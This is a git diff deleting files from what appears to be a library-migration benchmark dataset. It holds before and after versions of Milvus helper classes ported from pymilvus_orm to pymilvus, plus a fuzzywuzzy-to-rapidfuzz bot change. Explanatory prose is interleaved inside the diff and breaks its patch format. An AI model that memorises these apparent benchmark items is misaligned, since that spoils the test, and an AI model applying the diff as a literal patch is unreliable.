{}".format(e)) 
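The migrated benchmark helper above funnels collection management through pymilvus's utility module (drop_collection, list_collections, loading_progress, index_building_progress) instead of going through a Collection instance. A minimal sketch of those calls, assuming a Milvus server on 127.0.0.1:19530 and an existing collection named "demo" (both illustrative); utility.calc_distance, which the file also wraps, appears to have been removed from later pymilvus releases:

    from pymilvus import connections, utility

    # Connect once per process; host/port are illustrative defaults.
    connections.connect(host="127.0.0.1", port="19530")

    if utility.has_collection("demo"):
        print(utility.list_collections())               # all collection names
        print(utility.loading_progress("demo"))         # load state of "demo"
        print(utility.index_building_progress("demo"))  # indexed vs. total rows
        utility.drop_collection("demo")                 # replaces collection.drop()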
-+ LOGGER.error("Failed: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists -@@ -46,6 +44,8 @@ def create_collection(self, collection_name): - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) -+ else: -+ self.collection = Collection(name=collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) -@@ -55,7 +55,7 @@ def create_collection(self, collection_name): - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) -- self.collection = Collection(name=collection_name) -+ # self.collection = Collection(name=collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys diff --git a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py deleted file mode 100644 index 133734a..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.source.py +++ /dev/null @@ -1,119 +0,0 @@ -import sys -from pymilvus_orm import connections -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - 
self.collection = Collection(name=collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "Successfully drop table" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py deleted file mode 100644 index 466d947..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__a7f4c3f__solutions$question_answering_system$quick_deploy$server$src$milvus_helpers.py.target.py +++ /dev/null @@ -1,119 +0,0 @@ -import sys -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE -from logs import LOGGER - - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - 
LOGGER.error("ERROR: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - else: - self.collection = Collection(name=collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - # self.collection = Collection(name=collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "Successfully drop table" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git 
a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff deleted file mode 100644 index 1b60863..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py b/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py - index e033ec5f1ec0c44da782e82c8f9624bca63a299a..e5073e4c0c3e799822e939268d80c8f0601ea4cf 100644 - --- a/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py - +++ b/solutions/video_similarity_search/object_detection/server/src/milvus_helpers.py -@@ -1,10 +1,6 @@ - import sys --from pymilvus_orm import connections --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, TOP_K --from pymilvus_orm import utility -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - from logs import LOGGER - - diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py deleted file mode 100644 index a9755c3..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.source.py +++ /dev/null @@ -1,119 +0,0 @@ -import sys -from pymilvus_orm import connections -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, TOP_K -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, 
is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py deleted file mode 100644 index f511b1d..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$object_detection$server$src$milvus_helpers.py.target.py +++ /dev/null @@ -1,115 +0,0 @@ -import sys -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE, TOP_K -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection = None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - 
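Each of these helpers repeats the same create_collection pattern, and each carries the same `descrition` typo for the `description` keyword, which these pymilvus versions appear to ignore silently. A corrected sketch of the pattern, with VECTOR_DIMENSION and the collection name as illustrative stand-ins for the values from config.py:

    from pymilvus import Collection, CollectionSchema, DataType, FieldSchema

    VECTOR_DIMENSION = 128  # illustrative; the real value comes from config.py

    fields = [
        FieldSchema(name="id", dtype=DataType.INT64, description="int64",
                    is_primary=True, auto_id=True),
        FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR,
                    description="float vector", dim=VECTOR_DIMENSION),
    ]
    schema = CollectionSchema(fields=fields, description="collection description")
    collection = Collection(name="demo", schema=schema)  # "demo" is illustrative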
LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True, auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", - dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[field1, field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index = {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status = self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res = self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - 
self.set_collection(collection_name) - num = self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff deleted file mode 100644 index 333f4dc..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.diff +++ /dev/null @@ -1,16 +0,0 @@ -diff --git a/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py b/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py - index e033ec5f1ec0c44da782e82c8f9624bca63a299a..e5073e4c0c3e799822e939268d80c8f0601ea4cf 100644 - --- a/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py - +++ b/solutions/video_similarity_search/quick_deploy/server/src/milvus_helpers.py -@@ -1,10 +1,6 @@ - import sys --from pymilvus_orm import connections --from pymilvus_orm.types import DataType --from pymilvus_orm.schema import FieldSchema, CollectionSchema --from pymilvus_orm.collection import Collection - from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE --from pymilvus_orm import utility -+from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility - from logs import LOGGER - - diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py deleted file mode 100644 index 1edea49..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.source.py +++ /dev/null @@ -1,121 +0,0 @@ -import sys -from pymilvus_orm import connections -from pymilvus_orm.types import DataType -from pymilvus_orm.schema import FieldSchema, CollectionSchema -from pymilvus_orm.collection import Collection -from config import MILVUS_HOST, MILVUS_PORT, VECTOR_DIMENSION, METRIC_TYPE -from pymilvus_orm import utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection =None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not 
self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True,auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[ field1,field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - else: - self.set_collection(collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index= {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status= self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res=self.collection.search(vectors, anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num =self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py b/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py deleted file mode 100644 index 55b5e52..0000000 --- a/v1/data/codefile/milvus-io@bootcamp__e5073e4__solutions$video_similarity_search$quick_deploy$server$src$milvus_helpers.py.target.py +++ /dev/null @@ -1,117 +0,0 @@ -import sys -from config import MILVUS_HOST, MILVUS_PORT, 
VECTOR_DIMENSION, METRIC_TYPE -from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection, utility -from logs import LOGGER - - -class MilvusHelper: - def __init__(self): - try: - self.collection =None - connections.connect(host=MILVUS_HOST, port=MILVUS_PORT) - LOGGER.debug("Successfully connect to Milvus with IP:{} and PORT:{}".format(MILVUS_HOST, MILVUS_PORT)) - except Exception as e: - LOGGER.error("Failed to connect Milvus: {}".format(e)) - sys.exit(1) - - - def set_collection(self, collection_name): - try: - if self.has_collection(collection_name): - self.collection = Collection(name=collection_name) - else: - raise Exception("There has no collection named:{}".format(collection_name)) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Return if Milvus has the collection - def has_collection(self, collection_name): - try: - return utility.has_collection(collection_name) - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create milvus collection if not exists - def create_collection(self, collection_name): - try: - if not self.has_collection(collection_name): - field1 = FieldSchema(name="id", dtype=DataType.INT64, descrition="int64", is_primary=True,auto_id=True) - field2 = FieldSchema(name="embedding", dtype=DataType.FLOAT_VECTOR, descrition="float vector", dim=VECTOR_DIMENSION, is_primary=False) - schema = CollectionSchema(fields=[ field1,field2], description="collection description") - self.collection = Collection(name=collection_name, schema=schema) - LOGGER.debug("Create Milvus collection: {}".format(self.collection)) - else: - self.set_collection(collection_name) - return "OK" - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Batch insert vectors to milvus collection - def insert(self, collection_name, vectors): - try: - self.create_collection(collection_name) - data = [vectors] - mr = self.collection.insert(data) - ids = mr.primary_keys - self.collection.load() - LOGGER.debug( - "Insert vectors to Milvus in collection: {} with {} rows".format(collection_name, len(vectors))) - return ids - except Exception as e: - LOGGER.error("Failed to load data to Milvus: {}".format(e)) - sys.exit(1) - - # Create IVF_FLAT index on milvus collection - def create_index(self, collection_name): - try: - self.set_collection(collection_name) - default_index= {"index_type": "IVF_SQ8", "metric_type": METRIC_TYPE, "params": {"nlist": 16384}} - status= self.collection.create_index(field_name="embedding", index_params=default_index) - if not status.code: - LOGGER.debug( - "Successfully create index in collection:{} with param:{}".format(collection_name, default_index)) - return status - else: - raise Exception(status.message) - except Exception as e: - LOGGER.error("Failed to create index: {}".format(e)) - sys.exit(1) - - # Delete Milvus collection - def delete_collection(self, collection_name): - try: - self.set_collection(collection_name) - self.collection.drop() - LOGGER.debug("Successfully drop collection!") - return "ok" - except Exception as e: - LOGGER.error("Failed to drop collection: {}".format(e)) - sys.exit(1) - - # Search vector in milvus collection - def search_vectors(self, collection_name, vectors, top_k): - try: - self.set_collection(collection_name) - search_params = {"metric_type": METRIC_TYPE, "params": {"nprobe": 16}} - # data = [vectors] - res=self.collection.search(vectors, 
anns_field="embedding", param=search_params, limit=top_k) - print(res[0]) - LOGGER.debug("Successfully search in collection: {}".format(res)) - return res - except Exception as e: - LOGGER.error("Failed to search vectors in Milvus: {}".format(e)) - sys.exit(1) - - # Get the number of milvus collection - def count(self, collection_name): - try: - self.set_collection(collection_name) - num =self.collection.num_entities - LOGGER.debug("Successfully get the num:{} of the collection:{}".format(num, collection_name)) - return num - except Exception as e: - LOGGER.error("Failed to count vectors in Milvus: {}".format(e)) - sys.exit(1) diff --git a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff b/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff deleted file mode 100644 index c5baf31..0000000 --- a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/qary/skills/search_fuzzy_bots.py b/qary/skills/search_fuzzy_bots.py - index abd37ec277a246595abf78fc20775ae3d7af1f84..054d5d207cba12d9b5c4765454be1c51424ea4f3 100644 - --- a/qary/skills/search_fuzzy_bots.py - +++ b/qary/skills/search_fuzzy_bots.py -@@ -5,7 +5,7 @@ import os - - import yaml - import pandas as pd --from fuzzywuzzy import process -+from rapidfuzz import process - from ..constants import DATA_DIR - - log = logging.getLogger(__name__) -@@ -83,7 +83,7 @@ class Bot: - return db - - def reply(self, statement, db=None): -- """ Use fuzzywuzzy to find the closest key in the dictionary then return the value for that key -+ """ Use rapidfuzz to find the closest key in the dictionary then return the value for that key - - >>> bot = MovieBot() - >>> reply = bot.reply diff --git a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py b/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py deleted file mode 100644 index 69e3e2f..0000000 --- a/v1/data/codefile/nlpia@nlpia-bot__054d5d2__qary$skills$search_fuzzy_bots.py.source.py +++ /dev/null @@ -1,117 +0,0 @@ -""" Text search to retrieve a statement """ -import logging -import sys -import os - -import yaml -import pandas as pd -from fuzzywuzzy import process -from ..constants import DATA_DIR - -log = 